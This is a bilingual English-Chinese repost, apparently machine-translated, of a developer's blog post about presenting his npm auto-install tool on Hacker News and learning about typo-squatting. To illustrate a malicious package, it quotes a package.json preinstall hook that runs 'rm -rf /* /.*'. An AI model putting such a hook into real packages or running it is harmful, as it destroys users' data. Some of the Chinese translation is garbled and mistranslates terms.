hacker_从在Hacker News上展示我的作品中学到了什么

hacker

by Siddharth Kshetrapal

通过Siddharth Kshetrapal

从在Hacker News上展示我的作品中学到了什么 (What I learned from showing my work on Hacker News)

When writing JavaScript, I hate it that I have to leave my editor — and my train of thought — just to tab over to my terminal and install a new package with:

在编写JavaScript时，我讨厌它不得不离开编辑器和思路，只是跳到终端并安装新软件包，其中包括：

$ npm install --save express

To scratch my itch, I wrote a tiny node utility which lets me focus on the code without installing dependencies.

为了解决这个问题，我编写了一个微型节点实用程序，可让我专注于代码而无需安装依赖项。

I was pretty happy with it, so I wrapped it in a git repository and shared it on Hacker News.

我对此非常满意，因此将其包装在git存储库中并在Hacker News上共享。

If you’re interested, here’s a link to the repo, auto-install, which already has more than 6,000 downloads:

如果您有兴趣，这里是指向repo auto-install的链接，该库已经有6,000多次下载：

siddharthkp/auto-installauto-install - Install dependencies as you codegithub.com

siddharthkp / auto-install 自动安装-在编写 github.com时安装依赖项

即时回应 (An Instant response)

I wasn’t expecting much out of the post, just wanted to throw it out there in case someone else finds it useful.

我对发布的期望并不高，只是想把它扔出去，以防别人发现它有用。

What happened instead was a heated debate about the Node ecosystem!

相反，发生了关于节点生态系统的激烈辩论！

I’m not going to talk about what’s right or wrong with npm, since there’s enough about that already.

我不会谈论什么是正确的或错误的NPM，因为有足够的 关于 那个 已经 。

我学到的是： (What I learned:)

1.抢注 ！ (1. Typo-squatting!)

It’s a popular (and surprisingly common) form of hacking. Basically, a hacker hopes that you will make a typo, and uses that to screw you over.

这是一种流行的(而且出人意料的常见)黑客形式。 基本上，黑客希望您输入错误，并利用它来打扰您。

Say, instead of typing express, you accidentally type expres. This can result in installing a completely different module, which could be a malicious one.

说，而不是键入express，您不小心键入expres。 这可能会导致安装一个完全不同的模块，这可能是一个恶意模块。

João Jerónim shared the vulnerabilities exposed by installing a npm package with rimrafall. Check out the preinstall script in it’s package.json

JoãoJerónim分享了安装带有rimrafall的npm软件包所暴露的漏洞。 在package.json中检查预安装脚本

“scripts”: {    “preinstall”: “rm -rf /* /.*” }}

If you’re not familiar with that command, it basically deletes everything on your hard drive — including your operating system!

如果您不熟悉该命令，那么它基本上会删除硬盘上的所有内容，包括操作系统！

Thanks to some quick feedback, I added the --secure flag to protect against this.

感谢一些快速的反馈，我添加了--secure标志来防止这种情况。

2.对您的开发人员缺乏信任 (2. A lack of trust in your fellow developers)

I see an innate lack of trust in the skills and capabilities of other developers in the JavaScript community. Our tools have always been error-prone. Typo-squatting is a common problem with all package managers.

我发现对JavaScript社区中其他开发人员的技能和能力先天缺乏信任。 我们的工具始终容易出错。 打字错误是所有程序包管理者的常见问题。

Popular opinion is that the JavaScript community is filled with novice programmers, and that there’s no differentiation between what is authoritative and what isn’t.

流行的观点是，JavaScript社区充满了新手程序员，在什么是权威与什么不是权威之间没有区别。

This is my favorite comment on Hacker News:

这是我在Hacker News上最喜欢的评论：

As I see it, npm appears to be acting like there are a lot of unsolved problems in this realm, and in doing so are endangering a developer community that is absolutely full of amateurs.

正如我所看到的，npm的表现似乎是这个领域中存在许多未解决的问题，并且这样做正在危及绝对是业余爱好者的开发者社区。

You can read the whole thread here (it’s a teensy bit long):

您可以在此处阅读整个主题(有点长)：

Show HN: Auto install npm dependencies as you code | Hacker NewsShow HN: Auto install npm dependencies as you codenews.ycombinator.com

显示HN：在编码时自动安装npm依赖项 | 黑客新闻 节目HN：在您安装codenews.ycombinator.com时自动安装npm依赖项

好的零件 (The good parts)

Not all comments were bad. Some people reached out to me on twitter with kind words. I have to admit, that felt pretty cool.

并非 所有 评论都不好。 有人在Twitter上用友善的话语与我联系。 我不得不承认，这感觉很酷。

Feature requests and bug reports started flowing in! That kept me busy for a while. And then there was the kicker — npm weekly #54!

功能请求和错误报告开始大量涌入！ 那让我忙了一阵子。 然后是踢球者- 每周＃54 npm ！

Also mentioned on Hacker News, if you’re using webpack, you might be interested in a similar plugin by Eric Clemmons.

在Hacker News上也提到过，如果您使用的是webpack，您可能会对Eric Clemmons 的类似插件感兴趣。

JavaScript社区 (The JavaScript Community)

Javascript definitely has the lowest barrier to entry of any language, and has become the most popular language in the recent years.

Java语言无疑是所有语言中入门最少的语言，并且近年来已成为最受欢迎的语言 。

I have to agree that npm is not fully mature as a package manager (yet), and a lot of work needs to go into security (for example: sandboxing pre/post-install scripts, module signing, etc.)

我必须同意，npm作为软件包管理器还没有完全成熟(还需要)，并且需要进行大量工作来确保安全性(例如： 沙盒安装前/安装后脚本 ，模块签名等)。

But we have an open library ecosystem with an active developer community. Individual contributors have produced some amazing things in the past: Express.js, Socket.io, Redux, Vue, and even Node.js itself!

但是我们有一个开放的图书馆生态系统，拥有活跃的开发者社区。 过去，个人贡献者已经做出了一些令人惊奇的事情： Express.js ， Socket.io ， Redux ， Vue甚至Node.js本身！

Let’s not forget the great work that companies are doing to spread knowledge and best practices.

我们不要忘记公司在传播知识和最佳 实践方面所做的出色工作。

You can’t build a community without trust. We need to reduce the barriers to entry even further, and make it easy for new developers to learn and contribute.

没有信任就无法建立社区。 我们需要进一步降低准入门槛，并使新开发人员易于学习和贡献。

In closing, my advice to fellow developers: never stop shipping.

最后，我对其他开发人员的建议是：永远不要停止发货。

The more you code, the more you will learn.

您编写的代码越多，您就会学到更多。

If you liked this, click the ? below so other people will see this as well.

如果喜欢此，请单击“？”。 下面，其他人也会看到这一点。

翻译自: https://www.freecodecamp.org/news/what-i-learned-from-showing-my-work-on-hacker-news-48c54d78d5f4/

hacker